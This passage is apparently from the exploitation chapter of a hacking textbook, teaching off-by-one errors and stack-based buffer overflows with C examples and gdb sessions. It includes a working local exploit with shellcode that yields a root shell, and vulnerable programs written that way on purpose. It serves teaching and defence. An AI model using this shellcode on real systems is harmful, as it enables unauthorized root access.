EXPLOITATION - Hacking: The Art of Exploitation (2008)

Chapter 0x300. EXPLOITATION

Program exploitation is a staple of hacking. As demonstrated in the previous chapter, a program is made up of a complex set of rules following a certain execution flow that ultimately tells the computer what to do. Exploiting a program is simply a clever way of getting the computer to do what you want it to do, even if the currently running program was designed to prevent that action. Since a program can really only do what it's designed to do, the security holes are actually flaws or oversights in the design of the program or the environment the program is running in. It takes a creative mind to find these holes and to write programs that compensate for them. Sometimes these holes are the products of relatively obvious programmer errors, but there are some less obvious errors that have given birth to more complex exploit techniques that can be applied in many different places.

A program can only do what it's programmed to do, to the letter of the law. Unfortunately, what's written doesn't always coincide with what the programmer intended the program to do. This principle can be explained with a joke:

A man is walking through the woods, and he finds a magic lamp on the ground. Instinctively, he picks the lamp up, rubs the side of it with his sleeve, and out pops a genie. The genie thanks the man for freeing him, and offers to grant him three wishes. The man is ecstatic and knows exactly what he wants.

"First," says the man, "I want a billion dollars."

The genie snaps his fingers and a briefcase full of money materializes out of thin air.

The man is wide eyed in amazement and continues, "Next, I want a Ferrari."

The genie snaps his fingers and a Ferrari appears from a puff of smoke.

The man continues, "Finally, I want to be irresistible to women."

The genie snaps his fingers and the man turns into a box of chocolates.

Just as the man's final wish was granted based on what he said, rather than what he was thinking, a program will follow its instructions exactly, and the results aren't always what the programmer intended. Sometimes the repercussions can be catastrophic.

Programmers are human, and sometimes what they write isn't exactly what they mean. For example, one common programming error is called an off-by-one error. As the name implies, it's an error where the programmer has miscounted by one. This happens more often than you might think, and it is best illustrated with a question: If you're building a 100-foot fence, with fence posts spaced 10 feet apart, how many fence posts do you need? The obvious answer is 10 fence posts, but this is incorrect, since you actually need 11. This type of off-by-one error is commonly called a fencepost error, and it occurs when a programmer mistakenly counts items instead of spaces between items, or vice versa. Another example is when a programmer is trying to select a range of numbers or items for processing, such as items N through M. If N = 5 and M = 17, how many items are there to process? The obvious answer is M - N, or 17 - 5 = 12 items. But this is incorrect, since there are actually M - N + 1 items, for a total of 13 items. This may seem counterintuitive at first glance, because it is, and that's exactly why these errors happen.

Often, fencepost errors go unnoticed because programs aren't tested for every single possibility, and the effects of a fencepost error don't generally occur during normal program execution. However, when the program is fed the input that makes the effects of the error manifest, the consequences of the error can have an avalanche effect on the rest of the program logic. When properly exploited, an off-by-one error can cause a seemingly secure program to become a security vulnerability.

One classic example of this is OpenSSH, which is meant to be a secure terminal communication program suite, designed to replace insecure and unencrypted services such as telnet, rsh, and rcp. However, there was an off-by-one error in the channel-allocation code that was heavily exploited. Specifically, the code included an if statement that read:

if (id < 0 || id > channels_alloc) {

It should have been

if (id < 0 || id >= channels_alloc) {

In plain English, the code reads "If the ID is less than 0 or the ID is greater than the channels allocated, do the following stuff," when it should have been "If the ID is less than 0 or the ID is greater than or equal to the channels allocated, do the following stuff."

This simple off-by-one error allowed further exploitation of the program, so that a normal user authenticating and logging in could gain full administrative rights to the system. This type of functionality certainly wasn't what the programmers had intended for a secure program like OpenSSH, but a computer can only do what it's told.

Another situation that seems to breed exploitable programmer errors is when a program is quickly modified to expand its functionality. While this increase in functionality makes the program more marketable and increases its value, it also increases the program's complexity, which increases the chances of an oversight. Microsoft's IIS webserver program is designed to serve static and interactive web content to users. In order to accomplish this, the program must allow users to read, write, and execute programs and files within certain directories; however, this functionality must be limited to those particular directories. Without this limitation, users would have full control of the system, which is obviously undesirable from a security perspective. To prevent this situation, the program has path-checking code designed to prevent users from using the backslash character to traverse backward through the directory tree and enter other directories.

With the addition of support for the Unicode character set, though, the complexity of the program continued to increase. Unicode is a double-byte character set designed to provide characters for every language, including Chinese and Arabic. By using two bytes for each character instead of just one, Unicode allows for tens of thousands of possible characters, as opposed to the few hundred allowed by single-byte characters. This additional complexity means that there are now multiple representations of the backslash character. For example, %5c in Unicode translates to the backslash character, but this translation was done after the path-checking code had run. So by using %5c instead of \, it was indeed possible to traverse directories, allowing the aforementioned security dangers. Both the Sadmind worm and the CodeRed worm used this type of Unicode conversion oversight to deface web pages.

A related example of this letter-of-the-law principle used outside the realm of computer programming is the LaMacchia Loophole. Just like the rules of a computer program, the US legal system sometimes has rules that don't say exactly what their creators intended, and like a computer program exploit, these legal loopholes can be used to sidestep the intent of the law. Near the end of 1993, a 21-year-old computer hacker and student at MIT named David LaMacchia set up a bulletin board system called Cynosure for the purposes of software piracy. Those who had software to give would upload it, and those who wanted software would download it. The service was only online for about six weeks, but it generated heavy network traffic worldwide, which eventually attracted the attention of university and federal authorities. Software companies claimed that they lost one million dollars as a result of Cynosure, and a federal grand jury charged LaMacchia with one count of conspiring with unknown persons to violate the wire fraud statute. However, the charge was dismissed because what LaMacchia was alleged to have done wasn't criminal conduct under the Copyright Act, since the infringement was not for the purpose of commercial advantage or private financial gain. Apparently, the lawmakers had never anticipated that someone might engage in these types of activities with a motive other than personal financial gain. (Congress closed this loophole in 1997 with the No Electronic Theft Act.) Even though this example doesn't involve the exploiting of a computer program, the judges and courts can be thought of as computers executing the program of the legal system as it was written. The abstract concepts of hacking transcend computing and can be applied to many other aspects of life that involve complex systems.

Generalized Exploit Techniques

Off-by-one errors and improper Unicode expansion are all mistakes that can be hard to see at the time but are glaringly obvious to any programmer in hindsight. However, there are some common mistakes that can be exploited in ways that aren't so obvious. The impact of these mistakes on security isn't always apparent, and these security problems are found in code everywhere. Because the same type of mistake is made in many different places, generalized exploit techniques have evolved to take advantage of these mistakes, and they can be used in a variety of situations.

Most program exploits have to do with memory corruption. These include common exploit techniques like buffer overflows as well as less-common methods like format string exploits. With these techniques, the ultimate goal is to take control of the target program's execution flow by tricking it into running a piece of malicious code that has been smuggled into memory. This type of process hijacking is known as execution of arbitrary code, since the hacker can cause a program to do pretty much anything he or she wants it to. Like the LaMacchia Loophole, these types of vulnerabilities exist because there are specific unexpected cases that the program can't handle. Under normal conditions, these unexpected cases cause the program to crash, metaphorically driving the execution flow off a cliff. But if the environment is carefully controlled, the execution flow can be controlled as well, preventing the crash and reprogramming the process.

Buffer Overflows

Buffer overflow vulnerabilities have been around since the early days of computers and still exist today. Most Internet worms use buffer overflow vulnerabilities to propagate, and even the most recent zero-day VML vulnerability in Internet Explorer is due to a buffer overflow.

C is a high-level programming language, but it assumes that the programmer is responsible for data integrity. If this responsibility were shifted over to the compiler, the resulting binaries would be significantly slower, due to integrity checks on every variable. Also, this would remove a significant level of control from the programmer and complicate the language.

While C's simplicity increases the programmer's control and the efficiency of the resulting programs, it can also result in programs that are vulnerable to buffer overflows and memory leaks if the programmer isn't careful. This means that once a variable is allocated memory, there are no built-in safeguards to ensure that the contents of a variable fit into the allocated memory space. If a programmer wants to put ten bytes of data into a buffer that had only been allocated eight bytes of space, that type of action is allowed, even though it will most likely cause the program to crash. This is known as a buffer overrun or buffer overflow, since the extra two bytes of data will overflow and spill out of the allocated memory, overwriting whatever happens to come next. If a critical piece of data is overwritten, the program will crash. The overflow_example.c code offers an example.

overflow_example.c

#include <stdio.h>

#include <string.h>

int main(int argc, char *argv[]) {

int value = 5;

char buffer_one[8], buffer_two[8];

strcpy(buffer_one, "one"); /* Put "one" into buffer_one. */

strcpy(buffer_two, "two"); /* Put "two" into buffer_two. */

printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);

printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);

printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value);

printf("\n[STRCPY] copying %d bytes into buffer_two\n\n", (int) strlen(argv[1]));

strcpy(buffer_two, argv[1]); /* Copy first argument into buffer_two. */

printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);

printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);

printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value);

}

By now, you should be able to read the source code above and figure out what the program does. After compilation in the sample output below, we try to copy ten bytes from the first command-line argument into buffer_two, which only has eight bytes allocated for it.

reader@hacking:~/booksrc $ gcc -o overflow_example overflow_example.c

reader@hacking:~/booksrc $ ./overflow_example 1234567890

[BEFORE] buffer_two is at 0xbffff7f0 and contains 'two'

[BEFORE] buffer_one is at 0xbffff7f8 and contains 'one'

[BEFORE] value is at 0xbffff804 and is 5 (0x00000005)

[STRCPY] copying 10 bytes into buffer_two

[AFTER] buffer_two is at 0xbffff7f0 and contains '1234567890'

[AFTER] buffer_one is at 0xbffff7f8 and contains '90'

[AFTER] value is at 0xbffff804 and is 5 (0x00000005)

reader@hacking:~/booksrc $

Notice that buffer_one is located directly after buffer_two in memory, so when ten bytes are copied into buffer_two, the last two bytes of 90 overflow into buffer_one and overwrite whatever was there.

A larger buffer will naturally overflow into the other variables, but if a large enough buffer is used, the program will crash and die.

reader@hacking:~/booksrc $ ./overflow_example AAAAAAAAAAAAAAAAAAAAAAAAAAAAA

[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'

[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'

[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)

[STRCPY] copying 29 bytes into buffer_two

[AFTER] buffer_two is at 0xbffff7e0 and contains 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAAAAAAAAAAA'

[AFTER] value is at 0xbffff7f4 and is 1094795585 (0x41414141)

Segmentation fault (core dumped)

reader@hacking:~/booksrc $

These types of program crashes are fairly common; think of all of the times a program has crashed or blue-screened on you. The programmer's mistake is one of omission: there should be a length check or restriction on the user-supplied input. These kinds of mistakes are easy to make and can be difficult to spot. In fact, the notesearch.c program contains a buffer overflow bug. You might not have noticed this until right now, even if you were already familiar with C.

reader@hacking:~/booksrc $ ./notesearch AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

-------[ end of note data ]-------

Segmentation fault

reader@hacking:~/booksrc $

Program crashes are annoying, but in the hands of a hacker they can become downright dangerous. A knowledgeable hacker can take control of a program as it crashes, with some surprising results. The exploit_notesearch.c code demonstrates the danger.

exploit_notesearch.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

char shellcode[]=

"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"

"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"

"\xe1\xcd\x80";

int main(int argc, char *argv[]) {

unsigned int i, *ptr, ret, offset=270;

char *command, *buffer;

command = (char *) malloc(200);

bzero(command, 200); // Zero out the new memory.

strcpy(command, "./notesearch \'"); // Start command buffer.

buffer = command + strlen(command); // Set buffer at the end.

if(argc > 1) // Set offset.

offset = atoi(argv[1]);

ret = (unsigned int) &i - offset; // Set return address.

for(i=0; i < 160; i+=4) // Fill buffer with return address.

*((unsigned int *)(buffer+i)) = ret;

memset(buffer, 0x90, 60); // Build NOP sled.

memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

strcat(command, "\'");

system(command); // Run exploit.

free(command);

}

This exploit's source code will be explained in depth later, but in general, it's just generating a command string that will execute the notesearch program with a command-line argument between single quotes. It uses string functions to do this: strlen() to get the current length of the string (to position the buffer pointer) and strcat() to concatenate the closing single quote to the end. Finally, the system() function is used to execute the command string. The buffer that is generated between the single quotes is the real meat of the exploit. The rest is just a delivery method for this poison pill of data. Watch what a controlled crash can do.

reader@hacking:~/booksrc $ gcc exploit_notesearch.c

reader@hacking:~/booksrc $ ./a.out

[DEBUG] found a 34 byte note for user id 999

[DEBUG] found a 41 byte note for user id 999

-------[ end of note data ]-------

sh-3.2#

The exploit is able to use the overflow to serve up a root shell—providing full control over the computer. This is an example of a stack-based buffer overflow exploit.

Stack-Based Buffer Overflow Vulnerabilities

The notesearch exploit works by corrupting memory to control execution flow. The auth_overflow.c program demonstrates this concept.

auth_overflow.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

int check_authentication(char *password) {

int auth_flag = 0;

char password_buffer[16];

strcpy(password_buffer, password);

if(strcmp(password_buffer, "brillig") == 0)

auth_flag = 1;

if(strcmp(password_buffer, "outgrabe") == 0)

auth_flag = 1;

return auth_flag;

}

int main(int argc, char *argv[]) {

if(argc < 2) {

printf("Usage: %s <password>\n", argv[0]);

exit(0);

}

if(check_authentication(argv[1])) {

printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");

printf(" Access Granted.\n");

printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");

} else {

printf("\nAccess Denied.\n");

}

}

This example program accepts a password as its only command-line argument and then calls a check_authentication() function. This function allows two passwords, meant to be representative of multiple authentication methods. If either of these passwords is used, the function returns 1, which grants access. You should be able to figure most of that out just by looking at the source code before compiling it. Use the -g option when you do compile it, though, since we will be debugging this later.

reader@hacking:~/booksrc $ gcc -g -o auth_overflow auth_overflow.c

reader@hacking:~/booksrc $ ./auth_overflow

Usage: ./auth_overflow <password>

reader@hacking:~/booksrc $ ./auth_overflow test

Access Denied.

reader@hacking:~/booksrc $ ./auth_overflow brillig

-=-=-=-=-=-=-=-=-=-=-=-=-=-

Access Granted.

-=-=-=-=-=-=-=-=-=-=-=-=-=-

reader@hacking:~/booksrc $ ./auth_overflow outgrabe

-=-=-=-=-=-=-=-=-=-=-=-=-=-

Access Granted.

-=-=-=-=-=-=-=-=-=-=-=-=-=-

reader@hacking:~/booksrc $

So far, everything works as the source code says it should. This is to be expected from something as deterministic as a computer program. But an overflow can lead to unexpected and even contradictory behavior, allowing access without a proper password.

reader@hacking:~/booksrc $ ./auth_overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

-=-=-=-=-=-=-=-=-=-=-=-=-=-

Access Granted.

-=-=-=-=-=-=-=-=-=-=-=-=-=-

reader@hacking:~/booksrc $

You may have already figured out what happened, but let's look at this with a debugger to see the specifics of it.

reader@hacking:~/booksrc $ gdb -q ./auth_overflow

Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) list 1

1 #include <stdio.h>

2 #include <stdlib.h>

3 #include <string.h>

4

5 int check_authentication(char *password) {

6 int auth_flag = 0;

7 char password_buffer[16];

8

9 strcpy(password_buffer, password);

10

(gdb)

11 if(strcmp(password_buffer, "brillig") == 0)

12 auth_flag = 1;

13 if(strcmp(password_buffer, "outgrabe") == 0)

14 auth_flag = 1;

15

16 return auth_flag;

17 }

18

19 int main(int argc, char *argv[]) {

20 if(argc < 2) {

(gdb) break 9

Breakpoint 1 at 0x8048421: file auth_overflow.c, line 9.

(gdb) break 16

Breakpoint 2 at 0x804846f: file auth_overflow.c, line 16.

(gdb)

The GDB debugger is started with the -q option to suppress the welcome banner, and breakpoints are set on lines 9 and 16. When the program is run, execution will pause at these breakpoints and give us a chance to examine memory.

(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Starting program: /home/reader/booksrc/auth_overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 1, check_authentication (password=0xbffff9af 'A' <repeats 30 times>) at auth_overflow.c:9

9 strcpy(password_buffer, password);

(gdb) x/s password_buffer

0xbffff7a0: ")????o??????)\205\004\b?o??p???????"

(gdb) x/x &auth_flag

0xbffff7bc: 0x00000000

(gdb) print 0xbffff7bc - 0xbffff7a0

$1 = 28

(gdb) x/16xw password_buffer

0xbffff7a0: 0xb7f9f729 0xb7fd6ff4 0xbffff7d8 0x08048529

0xbffff7b0: 0xb7fd6ff4 0xbffff870 0xbffff7d8 0x00000000

0xbffff7c0: 0xb7ff47b0 0x08048510 0xbffff7d8 0x080484bb

0xbffff7d0: 0xbffff9af 0x08048510 0xbffff838 0xb7eafebc

(gdb)

The first breakpoint is before the strcpy() happens. By examining the password_buffer pointer, the debugger shows it is filled with random uninitialized data and is located at 0xbffff7a0 in memory. By examining the address of the auth_flag variable, we can see both its location at 0xbffff7bc and its value of 0. The print command can be used to do arithmetic and shows that auth_flag is 28 bytes past the start of password_buffer. This relationship can also be seen in a block of memory starting at password_buffer. The location of auth_flag is the last word in the second row of the dump, at 0xbffff7bc.

(gdb) continue

Continuing.

Breakpoint 2, check_authentication (password=0xbffff9af 'A' <repeats 30 times>) at auth_overflow.c:16

16 return auth_flag;

(gdb) x/s password_buffer

0xbffff7a0: 'A' <repeats 30 times>

(gdb) x/x &auth_flag

0xbffff7bc: 0x00004141

(gdb) x/16xw password_buffer

0xbffff7a0: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffff7b0: 0x41414141 0x41414141 0x41414141 0x00004141

0xbffff7c0: 0xb7ff47b0 0x08048510 0xbffff7d8 0x080484bb

0xbffff7d0: 0xbffff9af 0x08048510 0xbffff838 0xb7eafebc

(gdb) x/4cb &auth_flag

0xbffff7bc: 65 'A' 65 'A' 0 '\0' 0 '\0'

(gdb) x/dw &auth_flag

0xbffff7bc: 16705

(gdb)

Continuing to the next breakpoint found after the strcpy(), these memory locations are examined again. The password_buffer overflowed into the auth_flag, changing its first two bytes to 0x41. The value of 0x00004141 might look backward again, but remember that x86 has little-endian architecture, so it's supposed to look that way. If you examine each of these four bytes individually, you can see how the memory is actually laid out. Ultimately, the program will treat this value as an integer, with a value of 16705.

(gdb) continue

Continuing.

-=-=-=-=-=-=-=-=-=-=-=-=-=-

Access Granted.

-=-=-=-=-=-=-=-=-=-=-=-=-=-

Program exited with code 034.

(gdb)

After the overflow, the check_authentication() function will return 16705 instead of 0. Since the if statement considers any nonzero value to be authenticated, the program's execution flow is controlled into the authenticated section. In this example, the auth_flag variable is the execution control point, since overwriting this value is the source of the control.

But this is a very contrived example that depends on memory layout of the variables. In auth_overflow2.c, the variables are declared in reverse order. (The only change from auth_overflow.c is the order of the two variable declarations in check_authentication().)

auth_overflow2.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

int check_authentication(char *password) {

char password_buffer[16];

int auth_flag = 0;

strcpy(password_buffer, password);

if(strcmp(password_buffer, "brillig") == 0)

auth_flag = 1;

if(strcmp(password_buffer, "outgrabe") == 0)

auth_flag = 1;

return auth_flag;

}

int main(int argc, char *argv[]) {

if(argc < 2) {

printf("Usage: %s <password>\n", argv[0]);

exit(0);

}

if(check_authentication(argv[1])) {

printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");

printf(" Access Granted.\n");

printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");

} else {

printf("\nAccess Denied.\n");

}

}

This simple change puts the auth_flag variable before the password_buffer in memory. This eliminates the use of the auth_flag variable as an execution control point, since it can no longer be corrupted by an overflow.

reader@hacking:~/booksrc $ gcc -g auth_overflow2.c

reader@hacking:~/booksrc $ gdb -q ./a.out

Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) list 1

1 #include <stdio.h>

2 #include <stdlib.h>

3 #include <string.h>

4

5 int check_authentication(char *password) {

6 char password_buffer[16];

7 int auth_flag = 0;

8

9 strcpy(password_buffer, password);

10

(gdb)

11 if(strcmp(password_buffer, "brillig") == 0)

12 auth_flag = 1;

13 if(strcmp(password_buffer, "outgrabe") == 0)

14 auth_flag = 1;

15

16 return auth_flag;

17 }

18

19 int main(int argc, char *argv[]) {

20 if(argc < 2) {

(gdb) break 9

Breakpoint 1 at 0x8048421: file auth_overflow2.c, line 9.

(gdb) break 16

Breakpoint 2 at 0x804846f: file auth_overflow2.c, line 16.

(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Starting program: /home/reader/booksrc/a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 1, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>) at auth_overflow2.c:9

9 strcpy(password_buffer, password);

(gdb) x/s password_buffer

0xbffff7c0: "?o??\200????????o???G??\020\205\004\b?????\204\004\b????\020\205\004\bH???????\002"

(gdb) x/x &auth_flag

0xbffff7bc: 0x00000000

(gdb) x/16xw &auth_flag

0xbffff7bc: 0x00000000 0xb7fd6ff4 0xbffff880 0xbffff7e8

0xbffff7cc: 0xb7fd6ff4 0xb7ff47b0 0x08048510 0xbffff7e8

0xbffff7dc: 0x080484bb 0xbffff9b7 0x08048510 0xbffff848

0xbffff7ec: 0xb7eafebc 0x00000002 0xbffff874 0xbffff880

(gdb)

Similar breakpoints are set, and an examination of memory shows that auth_flag (the first word of each dump, at 0xbffff7bc, above and below) is located before password_buffer in memory. This means auth_flag can never be overwritten by an overflow in password_buffer.

(gdb) cont

Continuing.

Breakpoint 2, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>) at auth_overflow2.c:16

16 return auth_flag;

(gdb) x/s password_buffer

0xbffff7c0: 'A' <repeats 30 times>

(gdb) x/x &auth_flag

0xbffff7bc: 0x00000000

(gdb) x/16xw &auth_flag

0xbffff7bc: 0x00000000 0x41414141 0x41414141 0x41414141

0xbffff7cc: 0x41414141 0x41414141 0x41414141 0x41414141

0xbffff7dc: 0x08004141 0xbffff9b7 0x08048510 0xbffff848

0xbffff7ec: 0xb7eafebc 0x00000002 0xbffff874 0xbffff880

(gdb)

As expected, the overflow cannot disturb the auth_flag variable, since it's located before the buffer. But another execution control point does exist, even though you can't see it in the C code. It's conveniently located after all the stack variables, so it can easily be overwritten. This memory is integral to the operation of all programs, so it exists in all programs, and when it's overwritten, it usually results in a program crash.

(gdb) c

Continuing.

Program received signal SIGSEGV, Segmentation fault.

0x08004141 in ?? ()

(gdb)

Recall from the previous chapter that the stack is one of five memory segments used by programs. The stack is a FILO data structure used to maintain execution flow and context for local variables during function calls. When a function is called, a structure called a stack frame is pushed onto the stack, and the EIP register jumps to the first instruction of the function. Each stack frame contains the local variables for that function and a return address so EIP can be restored. When the function is done, the stack frame is popped off the stack and the return address is used to restore EIP. All of this is built in to the architecture and is usually handled by the compiler, not the programmer.

When the check_authentication() function is called, a new stack frame is pushed onto the stack above main()'s stack frame. In this frame are the local variables, a return address, and the function's arguments.

We can see all these elements in the debugger.

Figure 0x300-1.

reader@hacking:~/booksrc $ gcc -g auth_overflow2.c

reader@hacking:~/booksrc $ gdb -q ./a.out

Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) list 1

1 #include <stdio.h>

2 #include <stdlib.h>

3 #include <string.h>

4

5 int check_authentication(char *password) {

6 char password_buffer[16];

7 int auth_flag = 0;

8

9 strcpy(password_buffer, password);

10

(gdb)

11 if(strcmp(password_buffer, "brillig") == 0)

12 auth_flag = 1;

13 if(strcmp(password_buffer, "outgrabe") == 0)

14 auth_flag = 1;

15

16 return auth_flag;

17 }

18

19 int main(int argc, char *argv[]) {

20 if(argc < 2) {

(gdb)

21 printf("Usage: %s <password>\n", argv[0]);

22 exit(0);

23 }

24 if(check_authentication(argv[1])) {

25 printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");

26 printf(" Access Granted.\n");

27 printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");

28 } else {

29 printf("\nAccess Denied.\n");

30 }

(gdb) break 24

Breakpoint 1 at 0x80484ab: file auth_overflow2.c, line 24.

(gdb) break 9

Breakpoint 2 at 0x8048421: file auth_overflow2.c, line 9.

(gdb) break 16

Breakpoint 3 at 0x804846f: file auth_overflow2.c, line 16.

(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Starting program: /home/reader/booksrc/a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 1, main (argc=2, argv=0xbffff874) at auth_overflow2.c:24

24 if(check_authentication(argv[1])) {

(gdb) i r esp

esp 0xbffff7e0 0xbffff7e0

(gdb) x/32xw $esp

0xbffff7e0: 0xb8000ce0 0x08048510 0xbffff848 0xb7eafebc

0xbffff7f0: 0x00000002 0xbffff874 0xbffff880 0xb8001898

0xbffff800: 0x00000000 0x00000001 0x00000001 0x00000000

0xbffff810: 0xb7fd6ff4 0xb8000ce0 0x00000000 0xbffff848

0xbffff820: 0x40f5f7f0 0x48e0fe81 0x00000000 0x00000000

0xbffff830: 0x00000000 0xb7ff9300 0xb7eafded 0xb8000ff4

0xbffff840: 0x00000002 0x08048350 0x00000000 0x08048371

0xbffff850: 0x08048474 0x00000002 0xbffff874 0x08048510

(gdb)

The first breakpoint is right before the call to check_authentication() in main(). At this point, the stack pointer register (ESP) is 0xbffff7e0, and the top of the stack is shown. This is all part of main()'s stack frame. Continuing to the next breakpoint inside check_authentication(), the output below shows ESP is smaller as it moves up the list of memory to make room for check_authentication()'s stack frame, which is now on the stack. After finding the addresses of the auth_flag variable (0xbffff7bc) and the password_buffer variable (0xbffff7c0), their locations can be seen within the stack frame.

(gdb) c

Continuing.

Breakpoint 2, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>) at auth_overflow2.c:9

9 strcpy(password_buffer, password);

(gdb) i r esp

esp 0xbffff7a0 0xbffff7a0

(gdb) x/32xw $esp

0xbffff7a0: 0x00000000 0x08049744 0xbffff7b8 0x080482d9

0xbffff7b0: 0xb7f9f729 0xb7fd6ff4 0xbffff7e8 0x00000000

0xbffff7c0: 0xb7fd6ff4 0xbffff880 0xbffff7e8 0xb7fd6ff4

0xbffff7d0: 0xb7ff47b0 0x08048510 0xbffff7e8 0x080484bb

0xbffff7e0: 0xbffff9b7 0x08048510 0xbffff848 0xb7eafebc

0xbffff7f0: 0x00000002 0xbffff874 0xbffff880 0xb8001898

0xbffff800: 0x00000000 0x00000001 0x00000001 0x00000000

0xbffff810: 0xb7fd6ff4 0xb8000ce0 0x00000000 0xbffff848

(gdb) p 0xbffff7e0 - 0xbffff7a0

$1 = 64

(gdb) x/s password_buffer

0xbffff7c0: "?o??\200????????o???G??\020\205\004\b?????\204\004\b????\020\205\004\bH???????\002"

(gdb) x/x &auth_flag

0xbffff7bc: 0x00000000

(gdb)

Continuing to the second breakpoint in check_authentication(), a stack frame (the memory beginning at the new ESP, 0xbffff7a0) is pushed onto the stack when the function is called. Since the stack grows upward toward lower memory addresses, the stack pointer is now 64 bytes less at 0xbffff7a0. The size and structure of a stack frame can vary greatly, depending on the function and certain compiler optimizations. For example, the first 24 bytes of this stack frame are just padding put there by the compiler. The local stack variables, auth_flag and password_buffer, are shown at their respective memory locations in the stack frame. The auth_flag is shown at 0xbffff7bc, and the 16 bytes of the password buffer are shown at 0xbffff7c0.

The stack frame contains more than just the local variables and padding. Elements of the check_authentication() stack frame are shown below.

First, the memory saved for the local variables is shown in italic. This starts at the auth_flag variable at 0xbffff7bc and continues through the end of the 16-byte password_buffer variable. The next few values on the stack are just padding the compiler threw in, plus something called the saved frame pointer. If the program is compiled with the flag -fomit-frame-pointer for optimization, the frame pointer won't be used in the stack frame. The value 0x080484bb is the return address of the stack frame, and the value 0xbffff9b7 that follows it is a pointer to a string containing 30 As. This must be the argument to the check_authentication() function.

(gdb) x/32xw $esp

0xbffff7a0: 0x00000000 0x08049744 0xbffff7b8 0x080482d9

0xbffff7b0: 0xb7f9f729 0xb7fd6ff4 0xbffff7e8 0x00000000

0xbffff7c0: 0xb7fd6ff4 0xbffff880 0xbffff7e8 0xb7fd6ff4

0xbffff7d0: 0xb7ff47b0 0x08048510 0xbffff7e8 0x080484bb

0xbffff7e0: 0xbffff9b7 0x08048510 0xbffff848 0xb7eafebc

0xbffff7f0: 0x00000002 0xbffff874 0xbffff880 0xb8001898

0xbffff800: 0x00000000 0x00000001 0x00000001 0x00000000

0xbffff810: 0xb7fd6ff4 0xb8000ce0 0x00000000 0xbffff848

(gdb) x/32xb 0xbffff9b7

0xbffff9b7: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff9bf: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff9c7: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff9cf: 0x41 0x41 0x41 0x41 0x41 0x41 0x00 0x53

(gdb) x/s 0xbffff9b7

0xbffff9b7: 'A' <repeats 30 times>

(gdb)

The return address in a stack frame can be located by understanding how the stack frame is created. This process begins in the main() function, even before the function call.

(gdb) disass main

Dump of assembler code for function main:

0x08048474 <main+0>: push ebp

0x08048475 <main+1>: mov ebp,esp

0x08048477 <main+3>: sub esp,0x8

0x0804847a <main+6>: and esp,0xfffffff0

0x0804847d <main+9>: mov eax,0x0

0x08048482 <main+14>: sub esp,eax

0x08048484 <main+16>: cmp DWORD PTR [ebp+8],0x1

0x08048488 <main+20>: jg 0x80484ab <main+55>

0x0804848a <main+22>: mov eax,DWORD PTR [ebp+12]

0x0804848d <main+25>: mov eax,DWORD PTR [eax]

0x0804848f <main+27>: mov DWORD PTR [esp+4],eax

0x08048493 <main+31>: mov DWORD PTR [esp],0x80485e5

0x0804849a <main+38>: call 0x804831c <printf@plt>

0x0804849f <main+43>: mov DWORD PTR [esp],0x0

0x080484a6 <main+50>: call 0x804833c <exit@plt>

0x080484ab <main+55>: mov eax,DWORD PTR [ebp+12]

0x080484ae <main+58>: add eax,0x4

0x080484b1 <main+61>: mov eax,DWORD PTR [eax]

0x080484b3 <main+63>: mov DWORD PTR [esp],eax

0x080484b6 <main+66>: call 0x8048414 <check_authentication>

0x080484bb <main+71>: test eax,eax

0x080484bd <main+73>: je 0x80484e5 <main+113>

0x080484bf <main+75>: mov DWORD PTR [esp],0x80485fb

0x080484c6 <main+82>: call 0x804831c <printf@plt>

0x080484cb <main+87>: mov DWORD PTR [esp],0x8048619

0x080484d2 <main+94>: call 0x804831c <printf@plt>

0x080484d7 <main+99>: mov DWORD PTR [esp],0x8048630

0x080484de <main+106>: call 0x804831c <printf@plt>

